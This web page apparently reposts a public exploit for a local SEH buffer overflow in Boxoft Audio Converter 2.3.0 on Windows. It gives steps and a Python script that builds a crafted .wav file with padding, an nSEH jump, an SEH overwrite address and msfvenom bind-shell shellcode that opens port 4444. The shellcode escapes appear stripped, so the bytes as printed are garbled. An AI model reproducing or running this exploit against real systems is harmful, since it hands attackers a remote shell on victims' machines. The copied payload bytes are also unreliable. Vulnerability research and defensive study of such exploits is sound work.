Home Tools Exploits & CVE's Boxoft Audio Converter 2.3.0 Buffer Overflow

Boxoft Audio Converter 2.3.0 Buffer Overflow

November 24, 2020

947

Boxoft Audio Converter version 2.3.0 suffers from a buffer overflow vulnerability.

# Exploit Title: Boxoft Audio Converter 2.3.0 - '.wav' Buffer Overflow (SEH)
# Discovery by: Luis Martinez
# Discovery Date: 2020-11-22
# Vendor Homepage: http://www.boxoft.com/
# Software Link: http://www.boxoft.com/audio-converter/a-pdf-bac.exe
# Tested Version: 2.3.0
# Vulnerability Type: Local Buffer Overflow (SEH)
# Tested on OS: Windows 10 Pro (10.0.18362) x64 en

# Steps to Produce the Local Buffer Overflow (SEH): 
# 1.- Run python code: Boxotf_Audio_Converter_2.3.0.py
# 2.- Open AudioConvert.exe
# 3.- Try
# 4.- Batch Convert Mode -> Next
# 5.- Add
# 6.- Select Boxotf_Audio_Converter_2.3.0.wav -> Open
# 7.- Port 4444 open

#!/usr/bin/env python
#-*-coding: utf-8-*-

#msfvenom -p windows/shell_bind_tcp -b 'x00x0Ax0D' -f c

shellcode = ("xbbx80x84x2cxbcxdaxcexd9x74x24xf4x5ex33xc9xb1"
"x53x31x5ex12x83xc6x04x03xdex8axcex49x22x7ax8c"
"xb2xdax7bxf1x3bx3fx4ax31x5fx34xfdx81x2bx18xf2"
"x6ax79x88x81x1fx56xbfx22x95x80x8exb3x86xf1x91"
"x37xd5x25x71x09x16x38x70x4ex4bxb1x20x07x07x64"
"xd4x2cx5dxb5x5fx7ex73xbdxbcx37x72xecx13x43x2d"
"x2ex92x80x45x67x8cxc5x60x31x27x3dx1exc0xe1x0f"
"xdfx6fxccxbfx12x71x09x07xcdx04x63x7bx70x1fxb0"
"x01xaexaax22xa1x25x0cx8ex53xe9xcbx45x5fx46x9f"
"x01x7cx59x4cx3ax78xd2x73xecx08xa0x57x28x50x72"
"xf9x69x3cxd5x06x69x9fx8axa2xe2x32xdexdexa9x5a"
"x13xd3x51x9bx3bx64x22xa9xe4xdexacx81x6dxf9x2b"
"xe5x47xbdxa3x18x68xbexeaxdex3cxeex84xf7x3cx65"
"x54xf7xe8x10x5cx5ex43x07xa1x20x33x87x09xc9x59"
"x08x76xe9x61xc2x1fx82x9fxedx0ex0fx29x0bx5axbf"
"x7fx83xf2x7dxa4x1cx65x7dx8ex34x01x36xd8x83x2e"
"xc7xcexa3xb8x4cx1dx70xd9x52x08xd0x8exc5xc6xb1"
"xfdx74xd6x9bx95x15x45x40x65x53x76xdfx32x34x48"
"x16xd6xa8xf3x80xc4x30x65xeax4cxefx56xf5x4dx62"
"xe2xd1x5dxbaxebx5dx09x12xbax0bxe7xd4x14xfax51"
"x8fxcbx54x35x56x20x67x43x57x6dx11xabxe6xd8x64"
"xd4xc7x8cx60xadx35x2dx8ex64xfex5dxc5x24x57xf6"
"x80xbdxe5x9bx32x68x29xa2xb0x98xd2x51xa8xe9xd7"
"x1ex6ex02xaax0fx1bx24x19x2fx0e")

nSEH = "xebx06x90x90"
SEH = "xB8x68x40x00" #AudioConvert.exe

buffer = "x41" * 4132 + nSEH + SEH + "x90" * 16 + shellcode
f = open ("Boxotf_Audio_Converter_2.3.0.wav", "w")
f.write(buffer)
f.close()

Boxoft Audio Converter 2.3.0 Buffer Overflow

Follow us on Instagram @thecyberpost

EDITOR PICKS

EU investigating Meta for suspected failures over Russian election interference

On CISA’s role in protecting critical infrastructure, White House sticks to...

Hacker who blackmailed psychotherapy patients sentenced to six years in prison

POPULAR POSTS

Restaurant Reservation System Patches Easy-to-Exploit XSS Bug

Sniffle – A Sniffer For Bluetooth 5 And 4.X LE

Domhttpx – A Google Search Engine Dorker With HTTP Toolkit Built...

POPULAR CATEGORY

Baby Care System 1.0 SQL Injection

Slurp 1.10.2 Format String

Bludit 4.0.0-rc-2 Privilege Escalation